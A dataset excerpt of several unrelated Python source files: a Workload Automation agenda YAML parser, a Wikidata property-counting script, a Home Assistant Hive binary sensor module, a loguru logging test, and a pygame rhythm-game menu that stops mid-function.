id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
270365 | # Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from copy import copy
from collections import OrderedDict, defaultdict
import yaml
from wlauto.exceptions import ConfigError
from wlauto.utils.misc import load_struct_from_yaml, LoadSyntaxError
from wlauto.utils.types import counter, reset_counter
def get_aliased_param(d, aliases, default=None, pop=True):
alias_map = [i for i, a in enumerate(aliases) if a in d]
if len(alias_map) > 1:
message = 'Only one of {} may be specified in a single entry'
raise ConfigError(message.format(aliases))
elif alias_map:
if pop:
return d.pop(aliases[alias_map[0]])
else:
return d[aliases[alias_map[0]]]
else:
return default
class AgendaEntry(object):
def to_dict(self):
return copy(self.__dict__)
class AgendaWorkloadEntry(AgendaEntry):
"""
Specifies execution of a workload, including things like the number of
iterations, device runtime_parameters configuration, etc.
"""
def __init__(self, **kwargs):
super(AgendaWorkloadEntry, self).__init__()
self.id = kwargs.pop('id')
self.workload_name = get_aliased_param(kwargs, ['workload_name', 'name'])
if not self.workload_name:
raise ConfigError('No workload name specified in entry {}'.format(self.id))
self.label = kwargs.pop('label', self.workload_name)
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params', 'params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
self.classifiers = kwargs.pop('classifiers', OrderedDict())
if kwargs:
raise ConfigError('Invalid entry(ies) in workload {}: {}'.format(self.id, ', '.join(kwargs.keys())))
class AgendaSectionEntry(AgendaEntry):
"""
Specifies execution of a workload, including things like the number of
iterations, device runtime_parameters configuration, etc.
"""
def __init__(self, agenda, **kwargs):
super(AgendaSectionEntry, self).__init__()
self.id = kwargs.pop('id')
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params', 'params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
self.classifiers = kwargs.pop('classifiers', OrderedDict())
self.workloads = []
for w in kwargs.pop('workloads', []):
self.workloads.append(agenda.get_workload_entry(w))
if kwargs:
raise ConfigError('Invalid entry(ies) in section {}: {}'.format(self.id, ', '.join(kwargs.keys())))
def to_dict(self):
d = copy(self.__dict__)
d['workloads'] = [w.to_dict() for w in self.workloads]
return d
class AgendaGlobalEntry(AgendaEntry):
"""
Workload configuration global to all workloads.
"""
def __init__(self, **kwargs):
super(AgendaGlobalEntry, self).__init__()
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params', 'params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
self.classifiers = kwargs.pop('classifiers', OrderedDict())
if kwargs:
raise ConfigError('Invalid entries in global section: {}'.format(kwargs))
class Agenda(object):
def __init__(self, source=None):
self.filepath = None
self.config = {}
self.global_ = None
self.sections = []
self.workloads = []
self._seen_ids = defaultdict(set)
if source:
try:
reset_counter('section')
reset_counter('workload')
self._load(source)
except (ConfigError, LoadSyntaxError, SyntaxError), e:
raise ConfigError(str(e))
def add_workload_entry(self, w):
entry = self.get_workload_entry(w)
self.workloads.append(entry)
def get_workload_entry(self, w):
if isinstance(w, basestring):
w = {'name': w}
if not isinstance(w, dict):
raise ConfigError('Invalid workload entry: "{}" in {}'.format(w, self.filepath))
self._assign_id_if_needed(w, 'workload')
return AgendaWorkloadEntry(**w)
def _load(self, source): # pylint: disable=too-many-branches
try:
raw = self._load_raw_from_source(source)
except ValueError as e:
name = getattr(source, 'name', '')
raise ConfigError('Error parsing agenda {}: {}'.format(name, e))
if not isinstance(raw, dict):
message = '{} does not contain a valid agenda structure; top level must be a dict.'
raise ConfigError(message.format(self.filepath))
for k, v in raw.iteritems():
if v is None:
raise ConfigError('Empty "{}" entry in {}'.format(k, self.filepath))
if k == 'config':
if not isinstance(v, dict):
raise ConfigError('Invalid agenda: "config" entry must be a dict')
self.config = v
elif k == 'global':
self.global_ = AgendaGlobalEntry(**v)
elif k == 'sections':
self._collect_existing_ids(v, 'section')
for s in v:
if not isinstance(s, dict):
raise ConfigError('Invalid section entry: "{}" in {}'.format(s, self.filepath))
self._collect_existing_ids(s.get('workloads', []), 'workload')
for s in v:
self._assign_id_if_needed(s, 'section')
self.sections.append(AgendaSectionEntry(self, **s))
elif k == 'workloads':
self._collect_existing_ids(v, 'workload')
for w in v:
self.workloads.append(self.get_workload_entry(w))
else:
raise ConfigError('Unexpected agenda entry "{}" in {}'.format(k, self.filepath))
def _load_raw_from_source(self, source):
if hasattr(source, 'read') and hasattr(source, 'name'): # file-like object
self.filepath = source.name
raw = load_struct_from_yaml(text=source.read())
elif isinstance(source, basestring):
if os.path.isfile(source):
self.filepath = source
raw = load_struct_from_yaml(filepath=self.filepath)
else: # assume YAML text
raw = load_struct_from_yaml(text=source)
else:
raise ConfigError('Unknown agenda source: {}'.format(source))
return raw
def _collect_existing_ids(self, ds, pool):
# Collection needs to take place first so that auto IDs can be
# correctly assigned, e.g. if someone explicitly specified an ID
# of '1' for one of the workloads.
for d in ds:
if isinstance(d, dict) and 'id' in d:
did = str(d['id'])
if did in self._seen_ids[pool]:
raise ConfigError('Duplicate {} ID: {}'.format(pool, did))
self._seen_ids[pool].add(did)
def _assign_id_if_needed(self, d, pool):
# Also enforces string IDs
if d.get('id') is None:
did = str(counter(pool))
while did in self._seen_ids[pool]:
did = str(counter(pool))
d['id'] = did
self._seen_ids[pool].add(did)
else:
d['id'] = str(d['id'])
# Modifying the yaml parser to use an OrderedDict, rather then regular Python
# dict for mappings. This preservers the order in which the items are
# specified. See
# http://stackoverflow.com/a/21048064
_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
def dict_representer(dumper, data):
return dumper.represent_mapping(_mapping_tag, data.iteritems())
def dict_constructor(loader, node):
pairs = loader.construct_pairs(node)
seen_keys = set()
for k, _ in pairs:
if k in seen_keys:
raise ValueError('Duplicate entry: {}'.format(k))
seen_keys.add(k)
return OrderedDict(pairs)
yaml.add_representer(OrderedDict, dict_representer)
yaml.add_constructor(_mapping_tag, dict_constructor)
| StarcoderdataPython |
3245829 | import json
# create a list of the extracted properties and combine their facets to them -> using the property_dictionary.json
# .. from the wikidata_research
# .. per timeframe
#
def create_dict_based_on_properties_dict_timeframe_and_Wikidata_property_dict_per_timeframe(location, mode, redundant_mode):
if mode not in ["qualifier_metadata", "reference_metadata"]:
error_message = "Not supported mode: ", mode
raise Exception(error_message)
if redundant_mode not in ["redundant", "non_redundant"]:
error_message = "Not supported redundancy mode: ", redundant_mode
raise Exception(error_message)
result_dict = {}
result_dict["real_wikidata_properties"] = {}
result_dict["total_real_wikidata_property_usages"] = 0
# in case, someone used a property, e.g. "P969", which is not a property anywhere to be found in Wikidata
result_dict["false_wikidata_properties"] = {}
result_dict["total_false_wikidata_property_usages"] = 0
result_dict["unique_false_wikidata_property_usages"] = 0
path_to_stat_information = "data/" + location[:21] + "/" + location[22:] + "/statistical_information/" \
+ redundant_mode + "/" + mode + "/raw_counted_properties/properties_counted.json"
path_to_wikidata_property_dict = "data/property_dictionary.json"
with open(path_to_stat_information, "r") as stat_info_file:
stat_info = json.load(stat_info_file)
with open(path_to_wikidata_property_dict, "r") as wikidata_props_file:
wikidata_props = json.load(wikidata_props_file)
for PID in stat_info["properties"]:
# in case, a property mentioned in a query is in fact not a property to be found on Wikidata
# NOTE: we can be sure, that the property_dictionary.json of the wikidata_research contains
# .. all of the properties, that could have been available at the time the query was prompted,
# .. because, the data from SQID was extracted in 2022 and the queries are from 2017-2018
#
# of course, someone might just accidentally chose a property PID, that was false in 2017-2018
# .. but is in fact a property in 2022.
# But, as far as I see this case, this problem is too hard to solve and will not have any significant
# .. effect on the results of my analysis
if(PID not in wikidata_props):
result_dict["false_wikidata_properties"][PID] = {}
result_dict["false_wikidata_properties"][PID]["occurrences"] = stat_info["properties"][PID]
result_dict["total_false_wikidata_property_usages"] += stat_info["properties"][PID]
result_dict["unique_false_wikidata_property_usages"] += 1
else:
result_dict["real_wikidata_properties"][PID] = {}
result_dict["real_wikidata_properties"][PID]["occurrences"] = stat_info["properties"][PID]
result_dict["real_wikidata_properties"][PID]["facets"] = wikidata_props[PID]["facet_of"]
result_dict["real_wikidata_properties"][PID]["label"] = wikidata_props[PID]["label"]
result_dict["real_wikidata_properties"][PID]["datatype"] = wikidata_props[PID]["datatype"]
result_dict["real_wikidata_properties"][PID]["is_reference"] = wikidata_props[PID]["is_reference"]
result_dict["real_wikidata_properties"][PID]["qualifier_class"] = wikidata_props[PID]["qualifier_class"]
result_dict["total_real_wikidata_property_usages"] += stat_info["properties"][PID]
path_to_output = "data/" + location[:21] + "/" + location[22:] + "/statistical_information/" \
+ redundant_mode + "/" + mode + "/raw_counted_properties/properties_facets_and_datatypes.json"
with open(path_to_output, "w") as result_data:
json.dump(result_dict, result_data)
| StarcoderdataPython |
1845403 | """Support for the Hive binary sensors."""
from datetime import timedelta
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_CONNECTIVITY,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_SMOKE,
DEVICE_CLASS_SOUND,
BinarySensorEntity,
)
from . import ATTR_AVAILABLE, ATTR_MODE, DATA_HIVE, DOMAIN, HiveEntity
DEVICETYPE = {
"contactsensor": DEVICE_CLASS_OPENING,
"motionsensor": DEVICE_CLASS_MOTION,
"Connectivity": DEVICE_CLASS_CONNECTIVITY,
"SMOKE_CO": DEVICE_CLASS_SMOKE,
"DOG_BARK": DEVICE_CLASS_SOUND,
"GLASS_BREAK": DEVICE_CLASS_SOUND,
}
PARALLEL_UPDATES = 0
SCAN_INTERVAL = timedelta(seconds=15)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Hive Binary Sensor."""
if discovery_info is None:
return
hive = hass.data[DOMAIN].get(DATA_HIVE)
devices = hive.devices.get("binary_sensor")
entities = []
if devices:
for dev in devices:
entities.append(HiveBinarySensorEntity(hive, dev))
async_add_entities(entities, True)
class HiveBinarySensorEntity(HiveEntity, BinarySensorEntity):
"""Representation of a Hive binary sensor."""
@property
def unique_id(self):
"""Return unique ID of entity."""
return self._unique_id
@property
def device_info(self):
"""Return device information."""
return {"identifiers": {(DOMAIN, self.unique_id)}, "name": self.name}
@property
def device_class(self):
"""Return the class of this sensor."""
return DEVICETYPE.get(self.device["hiveType"])
@property
def name(self):
"""Return the name of the binary sensor."""
return self.device["haName"]
@property
def available(self):
"""Return if the device is available."""
if self.device["hiveType"] != "Connectivity":
return self.device["deviceData"]["online"]
return True
@property
def device_state_attributes(self):
"""Show Device Attributes."""
return {
ATTR_AVAILABLE: self.attributes.get(ATTR_AVAILABLE),
ATTR_MODE: self.attributes.get(ATTR_MODE),
}
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self.device["status"]["state"]
async def async_update(self):
"""Update all Node data from Hive."""
await self.hive.session.updateData(self.device)
self.device = await self.hive.sensor.get_sensor(self.device)
self.attributes = self.device.get("attributes", {})
| StarcoderdataPython |
1794800 | from loguru import logger
from bubop import logger, loguru_set_verbosity
def test_loguru_set_verbosity(caplog):
logger.debug("kalimera")
loguru_set_verbosity(0)
logger.debug("kalinuxta")
captured = caplog.text
assert "kalimera" in captured
assert "kalinuxta" not in captured
| StarcoderdataPython |
4965273 | from os.path import isfile
from pickle import dump, load
import pygame
from pygame.font import Font
from pygame.time import Clock
from pyperclip import paste
from audio_player import AudioPlayer
from game import Game
from library import Library
from track import Track
from util import ALL_LAYERS, seconds_to_readable_time
class Menu:
EXIT = 0
TITLE = 1
SETTINGS = 2
TRACK_SELECT = 3
TRACK_SETUP = 4
NEW_TRACK = 5
EDIT_TRACK = 6
SEARCH = 7
WHITE = (255, 255, 255)
GRAY = (128, 128, 128)
A_COLOR = (255, 128, 128)
B_COLOR = (255, 255, 128)
C_COLOR = (128, 255, 128)
D_COLOR = (128, 255, 255)
E_COLOR = (128, 128, 255)
F_COLOR = (255, 128, 255)
SELECTED_COLOR = D_COLOR
ENABLED_COLOR = C_COLOR
DISABLED_COLOR = A_COLOR
DIFFICULTY_COLORS = (C_COLOR, C_COLOR, C_COLOR, B_COLOR, B_COLOR, A_COLOR, D_COLOR, E_COLOR, F_COLOR)
def __init__(self):
pygame.mixer.pre_init(frequency=44100, size=-16, channels=2)
pygame.init()
self.clock = Clock()
info = pygame.display.Info()
self.size = self.width, self.height = int(info.current_w * .75), info.current_h
self.screen = pygame.display.set_mode(self.size, flags=pygame.SCALED | pygame.RESIZABLE, vsync=True)
pygame.display.set_icon(pygame.image.load('img/icon.png'))
pygame.display.set_caption('RIZUMU')
if isfile('library/saved.library'):
self.library = load(open('library/saved.library', 'rb'))
else:
self.library = Library()
pygame.mouse.set_visible(False)
self.screen_calls = [self.close_menu,
self.draw_menu,
self.draw_settings,
self.draw_track_select,
self.draw_track_setup,
self.draw_new_track,
self.draw_edit_track,
self.draw_search]
self.delay_time = 2 # Pre-track delay time
# Audio player
self.audio_device = 1
self.audio_player = AudioPlayer(self.delay_time)
self.audio_player.set_device(self.audio_device)
self.latency = self.audio_player.device.get_output_latency() * 0
# In-game options
self.layers_keys = {'A': [True, None], 'B': [True, None], 'C': [True, None], 'D': [True, None], 'E': [True, None], 'F': [True, None]}
self.prune_unused_layers = False
# Difficulty
self.preview_length = .5
self.lenience = 0.06 # seconds +/- per beat
# Fonts
self.large_font = Font('font/unifont.ttf', 36)
self.generic_font = Font('font/unifont.ttf', 26)
self.small_font = Font('font/unifont.ttf', 16)
# Sound Effects
self.play_hit_sound = True
self.bass_hit_sound_data = pygame.mixer.Sound(open('audio/bass.wav', 'rb').read())
self.high_hit_sound_data = pygame.mixer.Sound(open('audio/high.wav', 'rb').read())
pygame.mixer.set_num_channels(2)
# GUI variables
self.redraw_screen = True
self.current_screen = Menu.TITLE
self.last_screen = Menu.TITLE
self.track_selection_index = 0
'''
Main menu screen objects
'''
self.main_title = self.large_font.render('RIZUMU', True, Menu.WHITE)
self.main_title_box = self.main_title.get_rect()
self.main_title_box.center = self.width / 2, 200
self.main_play = self.large_font.render('Play', True, Menu.SELECTED_COLOR)
self.main_play_box = self.main_play.get_rect()
self.main_play_box.center = self.width / 2, 400
self.main_settings = self.large_font.render(f'Settings', True, Menu.WHITE)
self.main_settings_box = self.main_settings.get_rect()
self.main_settings_box.center = self.width / 2, 500
'''
Settings screen objects
'''
'''
Track select screen objects
'''
self.selected_tracks = self.library.get_tracks(self.track_selection_index)
self.select_track_0 = None
self.select_track_1 = None
self.select_track_2 = None
self.select_track_3 = None
self.select_track_4 = None
self.select_track_5 = None
self.select_track_6 = None
self.render_selected_tracks()
self.select_track_title = None
self.select_track_artist = None
self.select_track_album = None
self.select_track_high_score = None
self.select_track_high_score_accuracy = None
self.select_track_high_score_layers = None
self.select_track_duration = None
self.select_track_difficulty = None
self.select_track_num_beats_A = None
self.select_track_num_beats_B = None
self.select_track_num_beats_C = None
self.select_track_num_beats_D = None
self.select_track_num_beats_E = None
self.select_track_num_beats_F = None
self.render_selected_track_data()
self.select_edit = self.generic_font.render('e: Edit', True, Menu.WHITE)
self.select_new = self.generic_font.render('n: New', True, Menu.WHITE)
self.select_back = self.generic_font.render('⌫ : Back', True, Menu.WHITE)
self.select_play = self.generic_font.render('⏎ : Play', True, Menu.WHITE)
'''
Track setup screen objects
'''
self.setup_toggle = self.generic_font.render('⏎ : Select/Toggle', True, Menu.WHITE)
self.setup_back = self.select_back
'''
New track screen objects
'''
self.new_track_edit = self.generic_font.render('⏎ : Paste from clipboard', True, Menu.WHITE)
self.new_track_save = self.generic_font.render('s: Save', True, Menu.WHITE)
self.new_track_cancel = self.generic_font.render('⌫ : Cancel', True, Menu.WHITE)
'''
Edit track screen objects
'''
self.edit_track_delete = self.generic_font.render('d: Delete', True, Menu.WHITE)
'''
Search track screen objects
'''
# Start drawing
self.display_loop()
def render_selected_tracks(self):
def get_color(track):
if not track:
return Menu.WHITE
else:
return Menu.DIFFICULTY_COLORS[min(8, int(track.difficulty))]
self.select_track_0 = self.generic_font.render(f'{self.selected_tracks[0]}', True, get_color(self.selected_tracks[0]))
self.select_track_1 = self.generic_font.render(f'{self.selected_tracks[1]}', True, get_color(self.selected_tracks[1]))
self.select_track_2 = self.generic_font.render(f'{self.selected_tracks[2]}', True, get_color(self.selected_tracks[2]))
self.select_track_3 = self.generic_font.render(f'{self.selected_tracks[3]}', True, get_color(self.selected_tracks[3]))
self.select_track_4 = self.generic_font.render(f'{self.selected_tracks[4]}', True, get_color(self.selected_tracks[4]))
self.select_track_5 = self.generic_font.render(f'{self.selected_tracks[5]}', True, get_color(self.selected_tracks[5]))
self.select_track_6 = self.generic_font.render(f'{self.selected_tracks[6]}', True, get_color(self.selected_tracks[6]))
def render_selected_track_data(self):
if self.selected_tracks[3]:
color = Menu.DIFFICULTY_COLORS[min(8, int(self.selected_tracks[3].difficulty))]
self.select_track_title = self.large_font.render(f'{self.selected_tracks[3].title}', True, color)
self.select_track_artist = self.generic_font.render(f'{self.selected_tracks[3].artist}', True, Menu.WHITE)
self.select_track_album = self.generic_font.render(f'{self.selected_tracks[3].album}', True, Menu.WHITE)
self.select_track_high_score = self.generic_font.render(f'High Score: {self.selected_tracks[3].high_score}', True, Menu.WHITE)
self.select_track_high_score_accuracy = self.generic_font.render(f'{self.selected_tracks[3].high_score_accuracy:.3f}%', True, Menu.WHITE)
self.select_track_high_score_layers = self.generic_font.render(f'{self.selected_tracks[3].high_score_layers}', True, Menu.WHITE)
self.select_track_duration = self.generic_font.render(f'{seconds_to_readable_time(self.selected_tracks[3].duration)}', True, Menu.WHITE)
self.select_track_difficulty = self.generic_font.render(f'Difficulty: {self.selected_tracks[3].difficulty}', True, color)
self.select_track_num_beats_A = self.generic_font.render(f'{self.selected_tracks[3].num_beats["A"]}', True, Menu.A_COLOR)
self.select_track_num_beats_B = self.generic_font.render(f'{self.selected_tracks[3].num_beats["B"]}', True, Menu.B_COLOR)
self.select_track_num_beats_C = self.generic_font.render(f'{self.selected_tracks[3].num_beats["C"]}', True, Menu.C_COLOR)
self.select_track_num_beats_D = self.generic_font.render(f'{self.selected_tracks[3].num_beats["D"]}', True, Menu.D_COLOR)
self.select_track_num_beats_E = self.generic_font.render(f'{self.selected_tracks[3].num_beats["E"]}', True, Menu.E_COLOR)
self.select_track_num_beats_F = self.generic_font.render(f'{self.selected_tracks[3].num_beats["F"]}', True, Menu.F_COLOR)
def draw_menu(self):
label_selection_index = 0
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.current_screen = Menu.EXIT
return
elif event.type == pygame.KEYDOWN:
self.redraw_screen = True
if event.key == pygame.K_UP:
self.main_play = self.large_font.render('Play', True, Menu.SELECTED_COLOR)
self.main_settings = self.large_font.render(f'Settings', True, Menu.WHITE)
label_selection_index = 0
elif event.key == pygame.K_DOWN:
self.main_play = self.large_font.render('Play', True, Menu.WHITE)
self.main_settings = self.large_font.render(f'Settings', True, Menu.SELECTED_COLOR)
label_selection_index = 1
elif event.key == pygame.K_RETURN:
if label_selection_index == 0:
self.current_screen = Menu.TRACK_SELECT
elif label_selection_index == 1:
self.current_screen = Menu.SETTINGS
return
elif event.key == pygame.K_BACKSPACE:
self.current_screen = Menu.EXIT
return
if self.redraw_screen:
self.redraw_screen = False
self.screen.fill((0, 0, 0))
self.screen.blit(self.main_title, self.main_title_box)
self.screen.blit(self.main_play, self.main_play_box)
self.screen.blit(self.main_settings, self.main_settings_box)
pygame.display.flip()
self.clock.tick(30)
def draw_settings(self):
pass
# noinspection PyArgumentList
def draw_track_select(self):
pygame.key.set_repeat(250, 20)
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.current_screen = Menu.EXIT
return
elif event.type == pygame.KEYDOWN:
self.redraw_screen = True
if event.key == pygame.K_UP:
self.track_selection_index = max(self.track_selection_index - 1, 0)
self.selected_tracks = self.library.get_tracks(self.track_selection_index)
self.render_selected_tracks()
self.render_selected_track_data()
elif event.key == pygame.K_DOWN:
self.track_selection_index = min(self.track_selection_index + 1, len(self.library.saved_tracks) - 1)
self.selected_tracks = self.library.get_tracks(self.track_selection_index)
self.render_selected_tracks()
self.render_selected_track_data()
else:
if event.key == pygame.K_RETURN:
self.current_screen = Menu.TRACK_SETUP
return
elif event.key == pygame.K_BACKSPACE:
self.current_screen = Menu.TITLE
return
elif event.key == pygame.K_e:
self.current_screen = Menu.EDIT_TRACK
return
elif event.key == pygame.K_n:
self.current_screen = Menu.NEW_TRACK
return
if self.redraw_screen:
self.redraw_screen = False
self.screen.fill((0, 0, 0))
pygame.draw.rect(self.screen, Menu.GRAY, (15, 220, self.width - 30, 60), 1)
pygame.draw.line(self.screen, Menu.GRAY, (0, 500), (self.width, 500))
self.screen.blit(self.select_track_0, (15, 30))
self.screen.blit(self.select_track_1, (30, 100))
self.screen.blit(self.select_track_2, (45, 170))
select_track_3_text_box = self.select_track_3.get_rect()
select_track_3_text_box.center = 0, 250
self.screen.blit(self.select_track_3, (60, select_track_3_text_box[1]))
self.screen.blit(self.select_track_4, (45, 310))
self.screen.blit(self.select_track_5, (30, 380))
self.screen.blit(self.select_track_6, (15, 450))
self.screen.blit(self.select_edit, (15, self.height - 30))
self.screen.blit(self.select_new, (165, self.height - 30))
self.screen.blit(self.select_back, (self.width - 300, self.height - 30))
self.screen.blit(self.select_play, (self.width - 150, self.height - 30))
if self.selected_tracks[3]:
self.screen.blit(self.select_track_title, (15, 525))
self.screen.blit(self.select_track_artist, (15, 600))
self.screen.blit(self.select_track_album, (15, 650))
self.screen.blit(self.select_track_high_score, (15, 700))
self.screen.blit(self.select_track_high_score_accuracy, (self.width * .3, 700))
self.screen.blit(self.select_track_high_score_layers, (self.width * .45, 700))
self.screen.blit(self.select_track_difficulty, (15, 750))
self.screen.blit(self.select_track_num_beats_A, (15, 800))
self.screen.blit(self.select_track_num_beats_B, (90, 800))
self.screen.blit(self.select_track_num_beats_C, (165, 800))
self.screen.blit(self.select_track_num_beats_D, (240, 800))
self.screen.blit(self.select_track_num_beats_E, (315, 800))
self.screen.blit(self.select_track_num_beats_F, (390, 800))
self.screen.blit(self.select_track_duration, (500, 800))
pygame.display.flip()
self.clock.tick(60)
def draw_track_setup(self):
label_selection_index = 0
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.current_screen = Menu.EXIT
return
elif event.type == pygame.KEYDOWN:
self.redraw_screen = True
if event.key == pygame.K_RETURN:
if label_selection_index == 0:
pygame.key.set_repeat()
self.play_track(self.selected_tracks[3])
self.current_screen = Menu.TRACK_SELECT
return
elif label_selection_index == 1:
# toggle prune unused layers
self.prune_unused_layers = not self.prune_unused_layers
else:
# toggle enable for key
self.layers_keys[ALL_LAYERS[label_selection_index - 2]][0] = not self.layers_keys[ALL_LAYERS[label_selection_index - 2]][0]
elif event.key == pygame.K_BACKSPACE:
self.current_screen = Menu.TRACK_SELECT
return
elif event.key == pygame.K_DOWN:
label_selection_index = min(7, label_selection_index + 1)
break
elif event.key == pygame.K_UP:
label_selection_index = max(0, label_selection_index - 1)
break
elif event.key != pygame.K_ESCAPE and event.key != pygame.K_SPACE:
if label_selection_index >= 2:
for key, value in self.layers_keys.items():
if value[1] == event.key:
self.layers_keys[key][1] = None
self.layers_keys[ALL_LAYERS[label_selection_index - 2]][1] = event.key
if self.redraw_screen:
self.redraw_screen = False
self.screen.fill((0, 0, 0))
start_label = self.large_font.render('START', True, Menu.SELECTED_COLOR if label_selection_index == 0 else Menu.WHITE)
start_label_text_box = start_label.get_rect()
start_label_text_box.center = self.width / 2, 200
self.screen.blit(start_label, start_label_text_box)
prune_unused_layers_label = self.generic_font.render('Prune unused layers:', True, Menu.SELECTED_COLOR if label_selection_index == 1 else Menu.WHITE)
prune_unused_layers_enabled_label = self.generic_font.render(f'{self.prune_unused_layers}',
True, Menu.ENABLED_COLOR if self.prune_unused_layers else Menu.DISABLED_COLOR)
self.screen.blit(prune_unused_layers_label, (25, 275))
self.screen.blit(prune_unused_layers_enabled_label, (325, 275))
# A layer
A_label = self.generic_font.render('Layer A:', True, Menu.SELECTED_COLOR if label_selection_index == 2 else Menu.WHITE)
A_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["A"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["A"][0] else Menu.DISABLED_COLOR)
A_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["A"][1] is None else pygame.key.name(self.layers_keys["A"][1])}', True, Menu.WHITE)
self.screen.blit(A_label, (25, 350))
self.screen.blit(A_enabled_label, (175, 350))
self.screen.blit(A_key_label, (325, 350))
# B layer
B_label = self.generic_font.render('Layer B:', True, Menu.SELECTED_COLOR if label_selection_index == 3 else Menu.WHITE)
B_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["B"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["B"][0] else Menu.DISABLED_COLOR)
B_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["B"][1] is None else pygame.key.name(self.layers_keys["B"][1])}', True, Menu.WHITE)
self.screen.blit(B_label, (25, 425))
self.screen.blit(B_enabled_label, (175, 425))
self.screen.blit(B_key_label, (325, 425))
# C layer
C_label = self.generic_font.render('Layer C:', True, Menu.SELECTED_COLOR if label_selection_index == 4 else Menu.WHITE)
C_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["C"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["C"][0] else Menu.DISABLED_COLOR)
C_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["C"][1] is None else pygame.key.name(self.layers_keys["C"][1])}', True, Menu.WHITE)
self.screen.blit(C_label, (25, 500))
self.screen.blit(C_enabled_label, (175, 500))
self.screen.blit(C_key_label, (325, 500))
# D layer
D_label = self.generic_font.render('Layer D:', True, Menu.SELECTED_COLOR if label_selection_index == 5 else Menu.WHITE)
D_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["D"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["D"][0] else Menu.DISABLED_COLOR)
D_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["D"][1] is None else pygame.key.name(self.layers_keys["D"][1])}', True, Menu.WHITE)
self.screen.blit(D_label, (25, 575))
self.screen.blit(D_enabled_label, (175, 575))
self.screen.blit(D_key_label, (325, 575))
# E layer
E_label = self.generic_font.render('Layer E:', True, Menu.SELECTED_COLOR if label_selection_index == 6 else Menu.WHITE)
E_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["E"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["E"][0] else Menu.DISABLED_COLOR)
E_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["E"][1] is None else pygame.key.name(self.layers_keys["E"][1])}', True, Menu.WHITE)
self.screen.blit(E_label, (25, 650))
self.screen.blit(E_enabled_label, (175, 650))
self.screen.blit(E_key_label, (325, 650))
# F layer
F_label = self.generic_font.render('Layer F:', True, Menu.SELECTED_COLOR if label_selection_index == 7 else Menu.WHITE)
F_enabled_label = self.generic_font.render(f'{"Enabled" if self.layers_keys["F"][0] else "Disabled"}',
True, Menu.ENABLED_COLOR if self.layers_keys["F"][0] else Menu.DISABLED_COLOR)
F_key_label = self.generic_font.render(f'Key: {None if self.layers_keys["F"][1] is None else pygame.key.name(self.layers_keys["F"][1])}', True, Menu.WHITE)
self.screen.blit(F_label, (25, 725))
self.screen.blit(F_enabled_label, (175, 725))
self.screen.blit(F_key_label, (325, 725))
self.screen.blit(self.setup_toggle, (self.width - 450, self.height - 30))
self.screen.blit(self.setup_back, (self.width - 150, self.height - 30))
pygame.display.flip()
self.clock.tick(30)
def draw_new_track(self):
label_selection_index = 0
clipboard = paste()
new_track_filepath = clipboard if isfile(clipboard) and clipboard[clipboard.rindex('.'):] in ('.flac', '.opus', '.mp3', '.m4a') else None
new_track = Track(new_track_filepath) if new_track_filepath else None
while 1:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
if label_selection_index == 0:
clipboard = paste()
new_track_filepath = clipboard if isfile(clipboard) and clipboard[clipboard.rindex('.'):] in ('.flac', '.opus', '.mp3', '.m4a') else None
new_track = Track(new_track_filepath) if new_track_filepath else None
break
elif label_selection_index == 1:
new_track.set_title(paste())
break
elif label_selection_index == 2:
new_track.set_artist(paste())
break
elif label_selection_index == 3:
new_track.set_album(paste())
break
elif event.key == pygame.K_s:
